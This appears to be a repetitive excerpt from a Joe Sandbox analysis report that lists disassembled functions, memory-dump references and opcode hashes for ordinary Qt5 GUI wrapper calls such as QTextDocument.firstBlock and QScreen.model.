                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Vector4$Quaternion@@malloc
                                                                                                                                                                                                                                          • String ID: QQuaternion$toVector4D$toVector4D(self) -> QVector4D
                                                                                                                                                                                                                                          • API String ID: 60858153-2429867219
                                                                                                                                                                                                                                          • Opcode ID: 2e5fc8b902fac53a5947883f5c6bd8981848c93e174ec2e683d69e50287e75be
                                                                                                                                                                                                                                          • Instruction ID: e84c580df0abb7d5aa11940e9943fbbf1f3f26e1d9db5fdb71155be547829a20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e5fc8b902fac53a5947883f5c6bd8981848c93e174ec2e683d69e50287e75be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D112737A08A8A81EB109F61E8497A923A4FB44FD4F914032C98E07324EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D953D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?begin@QTextDocument@@QEBA?AVQTextBlock@@XZ.QT5GUI ref: 00007FF89D953DE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?begin@Block@@Document@@malloc
                                                                                                                                                                                                                                          • String ID: QTextDocument$firstBlock$firstBlock(self) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 3633996433-1044901945
                                                                                                                                                                                                                                          • Opcode ID: 0947b39f9ac7d9423658aeb75049a248dc0499bc80ee799f4ee26d359474ce3c
                                                                                                                                                                                                                                          • Instruction ID: 5a1bff467271eb8dca60ec399b43ce46924f32df495eda13fb6d6194dd6c2c76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0947b39f9ac7d9423658aeb75049a248dc0499bc80ee799f4ee26d359474ce3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E110977A09A4691EB109F61E8496A933A4FB44FD0F918032DA8E07320EF7DE559C784
                                                                                                                                                                                                                                          Function 00007FF89D94BD90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?transposed@QTransform@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D94BDE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?transposed@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QTransform$transposed$transposed(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 3469671558-3257874579
                                                                                                                                                                                                                                          • Opcode ID: d8f998b94befb08852833aad3b6efcff0d41ddda4679821d2a6a78257af7523f
                                                                                                                                                                                                                                          • Instruction ID: 9de30d6c3af4a50b5e497dada8cce8d15cd1b46b3a0550a4829714d40c5f64a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f998b94befb08852833aad3b6efcff0d41ddda4679821d2a6a78257af7523f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0112737A08A46D1EB109F25E8496A923E5FB44FD4F918032DA8E07320EF7CE559C784
                                                                                                                                                                                                                                          Function 00007FF89D9A5D10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?text@QStandardItem@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D9A5D68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?text@Item@@StandardString@@malloc
                                                                                                                                                                                                                                          • String ID: QStandardItem$text$text(self) -> str
                                                                                                                                                                                                                                          • API String ID: 1260637159-1680800330
                                                                                                                                                                                                                                          • Opcode ID: d21aad3598a7945a0862351a5ac370f1fa86e5a35d53d4f8aa12b7b68293fbcd
                                                                                                                                                                                                                                          • Instruction ID: 2c08678662ce7e3a5cce42a7b687c099f9be67cf7e970c12f45153aae61636a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d21aad3598a7945a0862351a5ac370f1fa86e5a35d53d4f8aa12b7b68293fbcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87113977A08A4686EB109F61E84A6A933A4FB44FD4F918032CA9E07320EF7CF559C344
                                                                                                                                                                                                                                          Function 00007FF89D96DD10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?model@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D96DD68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?model@Screen@@String@@malloc
                                                                                                                                                                                                                                          • String ID: QScreen$model$model(self) -> str
                                                                                                                                                                                                                                          • API String ID: 2207564037-863610309
                                                                                                                                                                                                                                          • Opcode ID: 81da2ba902baf83cd564ba8ff2846d9de7b5459ca3e98b7db3a6b30ea1310085
                                                                                                                                                                                                                                          • Instruction ID: 77a6eefd50ac0440223edfff2197874ec6681717f2df422e2076e6a3a5d79e6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81da2ba902baf83cd564ba8ff2846d9de7b5459ca3e98b7db3a6b30ea1310085
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C110977A08A46C2EB109F65E8496A933A5FB44FD0F918036D99E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9A7D60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?font@QStandardItem@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FF89D9A7DB8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?font@Font@@Item@@Standardmalloc
                                                                                                                                                                                                                                          • String ID: QStandardItem$font$font(self) -> QFont
                                                                                                                                                                                                                                          • API String ID: 2316968117-444833792
                                                                                                                                                                                                                                          • Opcode ID: 593c3eb07f3ca0f767e380fb78c19cdf4cbfa5bbe237f6c2092a65f440379f57
                                                                                                                                                                                                                                          • Instruction ID: c4ba0b67c089f47360d34dbc7af1595e7473fbea246d94d2cdcb805caf3ef5de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 593c3eb07f3ca0f767e380fb78c19cdf4cbfa5bbe237f6c2092a65f440379f57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75110C77A09A4681EB10DF55E84A6A933A4FB54FD4F918032C98E07320EF7DF559C344
                                                                                                                                                                                                                                          Function 00007FF89D9C1D70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toPolygon@QPolygonF@@QEBA?AVQPolygon@@XZ.QT5GUI ref: 00007FF89D9C1DC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PolygonPolygon@Polygon@@malloc
                                                                                                                                                                                                                                          • String ID: QPolygonF$toPolygon$toPolygon(self) -> QPolygon
                                                                                                                                                                                                                                          • API String ID: 4066872695-3446321353
                                                                                                                                                                                                                                          • Opcode ID: 5bfca227ca6124d6a6cd6e7e589d5e8f7523e8f223d25d67ce18dfe0ac54e101
                                                                                                                                                                                                                                          • Instruction ID: 050a0a83a02e02aafc399644a8eb60741b367f1e74f80d3edf60d655c44ea3d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bfca227ca6124d6a6cd6e7e589d5e8f7523e8f223d25d67ce18dfe0ac54e101
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7011FA37A08A4681EB109F65E8897A933A4FF44FD4F918036C99E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D957D70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?formats@QTextLayout@@QEBA?AV?$QVector@UFormatRange@QTextLayout@@@@XZ.QT5GUI ref: 00007FF89D957DC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
